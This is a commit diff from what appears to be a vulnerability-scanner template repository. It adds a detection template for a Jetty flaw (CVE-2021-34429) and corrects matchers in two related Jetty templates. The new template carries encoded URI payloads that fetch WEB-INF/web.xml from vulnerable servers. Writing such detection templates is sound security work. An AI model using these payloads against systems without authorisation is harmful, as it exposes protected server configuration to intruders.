Added CVE-2021-34429 and fixed related templates

2021-07-22 15:23:19 +05:30 · 2021-07-22 15:23:19 +05:30 · 938fdeec8f
parent 67f9ea2978
commit 938fdeec8f
3 changed files with 37 additions and 2 deletions
--- a/cves/2021/CVE-2021-28164.yaml
+++ b/cves/2021/CVE-2021-28164.yaml
@ -24,7 +24,7 @@ requests:

      - type: word
        words:
-          - "<web-app>"
+          - "</web-app>"
          - "java.sun.com"
        part: body
        condition: and
--- a/cves/2021/CVE-2021-28169.yaml
+++ b/cves/2021/CVE-2021-28169.yaml
@ -27,7 +27,7 @@ requests:

      - type: word
        words:
-          - "<web-app>"
+          - "</web-app>"
          - "java.sun.com"
        part: body
        condition: and
--- a/cves/2021/CVE-2021-34429.yaml
+++ b/cves/2021/CVE-2021-34429.yaml
@ -0,0 +1,35 @@
+id: CVE-2021-34429
+
+info:
+  name: Jetty Authorization Before Parsing and Canonicalization Variation
+  author: Bernardo Rodrigues @bernardofsr | André Monteiro @am0nt31r0
+  severity: medium
+  description: |
+    For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.
+  reference: |
+    - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
+  tags: cve,cve2021,jetty
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/%u002e/WEB-INF/web.xml'
+      - '{{BaseURL}}/.%00/WEB-INF/web.xml'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "</web-app>"
+          - "java.sun.com"
+        part: body
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"